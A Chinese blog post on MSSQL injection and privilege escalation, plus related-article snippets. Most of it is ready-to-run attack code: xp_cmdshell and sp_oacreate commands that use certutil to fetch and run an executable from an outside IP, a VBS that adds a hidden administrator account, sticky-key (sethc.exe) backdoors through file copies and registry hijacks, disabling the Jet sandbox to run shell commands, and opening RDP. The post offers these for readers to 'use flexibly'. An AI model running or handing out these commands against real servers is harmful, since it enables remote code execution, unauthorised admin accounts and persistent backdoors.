一篇文章由浅入深了解MSSQL注入

最新推荐文章于 2023-03-02 11:11:14 发布
最新推荐文章于 2023-03-02 11:11:14 发布
阅读量452 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bylfsj/article/details/102510268
版权

MSSQL提权与站库分离

1.权限

在这里插入图片描述

2.默认数据库

master、model、msdb、Northwind、pubs、tempdb

0x00 xp_cmdshell

在这里插入图片描述

exec master.dbo.xp_cmdshell 'cd c:www & certutil -urlcache -split -f 
http://192.168.130.142:80/download/file.exe';


exec master.dbo.xp_cmdshell 'cd c:www & file.exe';

在这里插入图片描述
在这里插入图片描述
如果被删除,可以试试恢复。

exec sp_addextendedproc 'xp_cmdshell','Xplog70.dll'

在这里插入图片描述

0x01 sp_oacreate

在这里插入图片描述

开启

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',1;recofigure;

关闭

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',0;reconfigure;
exec sp_configure 'show advanced options',0;reconfigure;

1.调用cmd 来执行命令

w.shell执行命令
declare @shell int exec sp_oacreate 'w.shell',
@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c xxx'

使用OLE自动存储过程执行命令,不返回执行结果,需将结果输出到一个文本中,然后使用xp_readerrorlog读取文本

Shell.Application执行命令,想查看
declare @o int
exec sp_oacreate 'Shell.Application', @o out
exec sp_oamethod @o, 'run',null,'c:\windows\system32\cmd.exe /c net user>d:\e.txt'

exec master.dbo.xp_readerrorlog 1,'d:\e.txt'

2.写入启动项

declare @sp_passwordxieo int, @f int, @t int, @ret int
exec sp_oacreate 'ing.filesystemobject', @sp_passwordxieo out

exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:RECYCLER1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'set wsnetwork=CreateObject("W.NETWORK")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'Set oe=GetObject(os&"/Administrators,group")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';

3粘贴键替换

declare @o int
exec sp_oacreate 'ing.filesystemobject', @o out

exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @o int
exec sp_oacreate 'ing.filesystemobject', @o out

exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' 
,'c:\windows\system32\dll\cache\sethc.exe';

大家可以灵活运用,这里也可以这样玩,把他写成vbs或者其他的来下载文件 ,为什么不直接调用cmd来下载,在2008系统上我是不成功的,但是sp_oacreate可以启动这个文件,所以换个思路。

declare @sp_passwordxieo int, @f int, @t int, @ret int;
exec sp_oacreate 'ing.filesystemobject', @sp_passwordxieo out;

exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'c:www1.bat', 1;
exec @ret = sp_oamethod @f, 'writeline', NULL,'@echo off';

exec @ret = sp_oamethod @f, 'writeline', NULL,'start cmd /k "cd c:www & certutil -urlcache -split -f http://192.168.130.142:80/download/file.exe"';

declare @shell int exec sp_oacreate 'w.shell',
@shell output exec sp_oamethod @shell,'run',null,'c:\www\1.bat'

declare @shell int exec sp_oacreate 'w.shell',
@shell output exec sp_oamethod @shell,'run',null,'c:\www\file.exe'

当然这里只是一种思路,你完全可以用vbs来下载什么的

4.其他操作

0x04 其他操作

删除文件

declare @result int
declare @fso_token int
exec sp_oacreate 'scripting.filesystemobject', @fso_token out
exec sp_oamethod @fso_token,'deletefile',null,'c:\1.txt'
exec sp_oadestroy @fso_token

复制文件

declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'copyfile',null,'c:\1.txt','c:\2.txt'

移动文件

declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'movefile',null,'c:\1.txt','c:\3.txt'

替换粘滞键

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe', 'c:\windows\system32\sethc.exe'
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo i=out
exec sp_oamethod @oo,'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe'

在这里插入图片描述

0x02 沙盒

在这里插入图片描述
在这里插入图片描述
关闭沙盒模式

1. exec master..xp_regwrite 
'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0;
2. exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode''REG_DWORD',0;

2.1

在这里插入图片描述
在这里插入图片描述

4. Select * From 
 OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell( net user itpro gmasfm /add )');

在这里插入图片描述

在这里插入图片描述

0x03 xp_regwrite

修改注册表 来劫持粘贴键 当然在2008数据库是不成立的 因为默认权限很低。

exec master..xp_regwrite 
'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsNTCurrentVersionImage File Execution

Optionssethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';

在这里插入图片描述

0x04 xp_regread /xp_regwrite

在这里插入图片描述
开放3389端口。
在这里插入图片描述

0x05 pulic

在这里插入图片描述
在这里插入图片描述

0x06 反弹注射技术

依靠opendatasource函数支持实现。

1.opendatasource 函数语法

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

bylfsj
关注
专栏目录
Spring Boot入门(07):整合 MySQL 和 Druid数据源 | 全网最详细保姆级教学(两万字)
**My Coding Family**
08-16 1万+
在Spring Boot中,整合MySQL和Druid数据源是不可或缺的一步。本文将为您介绍最详细的保姆级教学,从配置pom.xml到创建数据库、数据表,再到编写Java代码,一步一步地带您实现整合MySQL和Druid数据源。文章总字数达到两万字,细致全面,绝不让您失望。来一起学习吧!
Spring Boot进阶(73):Spring Boot如何优雅地使用Feign进行服务间通信?
最新发布
**My Coding Family**
06-29 1057
本文将通过以下几个部分介绍如何使用Feign进行服务间通信: Feign的概念及使用场景 在Spring Boot中使用Feign的步骤 Feign的注解和配置参数 使用Feign的测试用例 总结
一文读懂Sql注入
吴成伟的博客
12-19 212
易被sql注入 public class SqlInject { public static void main(String[] args) throws Exception{ String url="jdbc:mysql:///db_scott"; String user="root"; String password="root"; ...
一篇文章搞懂SQL注入
s40d1's Blog
07-24 1413
文章目录0X00 数据库相关概念数据(DATA):图像、语音、文字数据库(Database):Access、MSSQL、Oracle、SQLITE、MySQL等数据库管理系统(DBMS):Access、MSSQL、Oracle、SQLITE、MySQL等结构化查询语言(SQL):DQL、DDL、DML、TCL、DCL数据库常见的操作1、增删改查:insert,update,delete,select2、SQL order by 语句3、union联合查询4、MySql数据库4.1 COLUMNS表查询数据库
MSSQL注入
秋水的博客
09-04 9095
MSSQL数据库 数据库简介 MSSQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。属关系型数据库 注入简介 MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖的攻击思路 ...
MSSQL常用查询写法2
yuanxi21的博客
03-02 173
MSSQL常用查询写法
SQL server数据库declare和set、用法技巧
dihuoliubing的博客
10-31 1万+
直接赋值时set与select并无区别,只有所赋的值是一个查询结果时二者才有不同,当查询结果唯一时(如最大最小值),set和select都可以完成赋值,但是查询结果不止一个时使用set会提示错误。
PHP完全自学教程(全篇) 从基本讲到高级 由浅入深
07-28
- **MySQL连接**: 使用`mysqli`或`PDO`扩展连接MySQL数据库,执行SQL语句。 - **预处理语句**: 使用预处理语句防止SQL注入,提高安全性。 - **数据库查询结果处理**: `fetch_assoc()`、`fetch_array()`获取查询...
Spring Cloud 从入门到精通
热门推荐
GitChat
07-03 79万+
Spring Cloud 是一套完整的微服务解决方案,基于 Spring Boot 框架,准确的说,它不是一个框架,而是一个大的容器,它将市面上较好的微服务框架集成进来,从而简化了开发者的代码量。 本课程由浅入深带领大家一步步攻克 Spring Cloud 各大模块,接着通过一个实例带领大家了解大型分布式微服务架构的搭建过程,最后深入源码加深对它的了解。 本课程共分为四个部分: 第一部分(第...
[网络安全自学篇] 八十四.《Windows黑客编程技术详解》之VS环境配置、基础知识及DLL延迟加载详解(1)
杨秀璋的专栏
06-19 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第一篇文章主要包括两部分内容,开发环境(VS、编译设置)、基础技术、运行单一实例(互斥对象示例)、DLL延迟加载(skin++换皮肤示例)、资源释放(MFC示例)。希望对您有所帮助~
渗透测试之MSSQL简单绕过注入(declare函数)
LKmnbZ's Blog
11-08 1547
引进一个declare 函数,他是mssql声明局部变量的函数,我们经常用它来绕过waf对一些关键词的拦截 select * from admin where id =1;declare @a nvarchar(2000) set @a='select convert(int,@@version)' exec(@a) -- http://192.168.20.155/test.aspx?i...
mysqldeclare语句用法_MySQL declare语句用法介绍
weixin_32017139的博客
01-25 1万+
MySQLdeclare语句是我们经常用到的语句,下文就为您举例说明了MySQL declare语句的用法,希望对您学习MySQL declare语句的使用能有所帮助。MySQL declare语句是在复合语句中声明变量的指令。(1)Example with two DECLARE statements 两个DECLARE语句的实例CREATEPROCEDUREp8()BEGINDECL...
【MSSQL】常用功能
qq_39941918的博客
03-03 530
查看列类型 declare @table Varchar(20), @isnullable tinyint, – 0-必录 1-非必录 2-不做判断 @column_name varchar(25) – 查看有没有这个列 Select @table = ‘tbUploadGoodsImagesHash’ ,@column_name = ‘GoodsImages’,@isnullable = 2 use cb_erp_tmp SELECT ‘YH_ERP_YHYZ’ = is_nullable,column
MySQL declare语句用法介绍
superbfly的专栏
10-11 5万+
MySQLdeclare语句是我们经常用到的语句,下文就为您举例说明了MySQL declare语句的用法,希望对您学习MySQL declare语句的使用能有所帮助。 MySQL declare语句是在复合语句中声明变量的指令。 (1)Example with two DECLARE statements 两个DECLARE语句的实例 CREATEPROCEDUREp8
mysql的变量定义 (declare,set,@)
Osborn的博客
06-10 2万+
MySQL变量一共分为两大类:用户自定义变量和系统变量。如下: 用户自定义变量 局部变量 会话变量 系统变量 会话变量 全局变量 用户变量:以”@”开始,形式为”@变量名”。用户变量跟mysql客户端是绑定的,设置的变量,只对当前用户使用的客户端生效 全局变量:定义时,以如下两种形式出现,set GLOBAL 变量名 或者 set @@global.变量名,...
mysql存储过程的坑(关于declare与具体实现顺序)
qq_31342501的博客
09-29 6069
先上代码BEGIN DECLARE hotelId BIGINT DEFAULT 0; DECLARE done int DEFAULT FALSE; DECLARE tbtypeId BIGINT DEFAULT 0; SELECT id into tbtypeId from dbbanquet.tbtype where fname = '早餐';/* 声明游标 */ declare
Mssql常用经典SQL语句大全完整版--详解+实例
lifushan123的专栏
12-01 1万+
下列语句部分是Mssql语句,不可以在access中使用。   SQL分类:   DDL—数据定义语言(CREATE,ALTER,DROP,DECLARE)   DML—数据操纵语言(SELECT,DELETE,UPDATE,INSERT)   DCL—数据控制语言(GRANT,REVOKE,COMMIT,ROLLBACK)   首先,简要介绍基础语句:   1、说明:创建数据库 C
sql注入之——mssql(sqlserver)执行系统命令
wsnbbz的博客
02-12 5451
原理 利用xp_cmdshell扩展存储过程,此存储过程可以直接执行系统命令 开启xp_cmdshell扩展存储过程 ?id=1;use master;exec sp_configure ‘show advanced options’,1;reconfigure;exec sp_configure ‘xp_cmdshell’,1;reconfigure; 执行系统命令 ?id=1;use mas...
MySQL入门到精通教程:安装、管理与优化指南
《MySQL经典教程》是一本专为初学者和有一定基础的读者设计的培训教材,旨在帮助读者深入理解并熟练掌握MySQL数据库管理系统。教程内容涵盖MySQL的各个方面,从基础到高级,逐步引导读者探索这个强大的开源数据库...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值